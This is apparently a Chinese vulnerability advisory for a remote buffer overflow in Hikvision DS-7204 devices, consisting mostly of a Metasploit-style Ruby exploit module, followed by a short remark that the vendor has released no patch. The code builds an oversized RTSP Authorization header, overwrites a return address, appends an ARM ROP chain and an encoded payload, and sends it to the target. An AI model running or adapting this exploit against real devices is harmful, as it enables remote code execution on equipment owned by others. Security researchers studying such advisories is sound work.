7204远程缓冲区溢出漏洞(CVE(2)

request =  "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"
    request << "CSeq: 7\r\n"
    request << "Authorization: Basic "
    request << rand_text_alpha(0x280 + 34)
    request << [target["g_adjustesp"]].pack("V")[0..2]
    request << "\r\n\r\n"
    request << rand_text_alpha(19)

# now append the ropchain
    request << device_rop
    request << rand_text_alpha(8)
    request << payload.encoded

connect
    sock.put(request)
    disconnect
  end

# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
  def target_ds7204_1
    # Create a fixed-size buffer for the rop chain
    ropbuf = rand_text_alpha(24)

# CHAIN = [
    #  0, #R4 pop adjustsp
    #  0, #R5 pop adjustsp
    #  GADGET_BLXR3_POP, #R6 pop adjustsp
    #  GADGET_POPR3,
    #  0, #R3 pop
    #  GADGET_R3FROMSP,
    # ]

ropbuf[8,4] = [target["g_blxr3_pop"]].pack("V")
    ropbuf[12,4] = [target["g_popr3"]].pack("V")
    ropbuf[20,4] = [target["g_r3fromsp"]].pack("V")

return ropbuf
  end

# Generate a buffer that provides a starting point for exploit development
  def target_debug
    Rex::Text.pattern_create(2000)
  end

# Remote host, read from the module datastore ('RHOST').
#
# @return [Object] whatever the datastore holds under 'RHOST'
def rhost
  host = datastore['RHOST']
  host
end

# Remote port, read from the module datastore ('RPORT').
#
# @return [Object] whatever the datastore holds under 'RPORT'
def rport
  port = datastore['RPORT']
  port
end

end

建议:
厂商补丁:

hikvision
 ---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

